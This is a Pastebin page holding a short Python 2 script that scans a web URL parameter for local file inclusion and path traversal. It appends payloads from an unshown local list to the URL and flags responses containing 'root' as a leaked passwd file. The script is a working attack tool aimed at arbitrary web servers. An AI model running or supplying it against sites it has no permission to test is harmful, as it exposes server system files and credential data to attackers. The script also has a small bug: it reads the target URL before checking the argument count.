Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- # ----
- # try_lfi.py - simple find if there is LFI vulnerability
- # ----
- # - can be also used to find traversal-vulnerabilities
- # - tests can be extended to find more information than just passwd file.
- # more @ http://hauntit.blogspot.com
- import urllib
- import sys
- #defines:
- url=sys.argv[1]
- checkLfis = open('LFItext.txt','r')
- try_lfi = checkLfis.readlines()
- if len(sys.argv) < 2:
- sys.stderr.write('usage: '+sys.argv[0]+' http://localhost/page?param=')
- sys.exit(1)
- else:
- print '---------------------------------------------------------------'
- print '[+] Searching for traversal/LFI vulnerability at URL: ', url
- print '---------------------------------------------------------------'
- i=0
- for line in try_lfi:
- full_url_to_check = url+line
- try_page = urllib.urlopen(full_url_to_check)
- read_page = try_page.readlines()
- i=i+1
- print 'Trying: ',line
- print 'Status: ', try_page.getcode()
- print '\t[~] Now reading the answer to find out if there is our \'vulnerable-string\'...'
- for read_lines in read_page:
- if read_lines.find('root') != -1:
- print '\t[+] Found potential LFI bug! This is the answer: ', read_lines
- print '---------------------------------------------------------------'
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement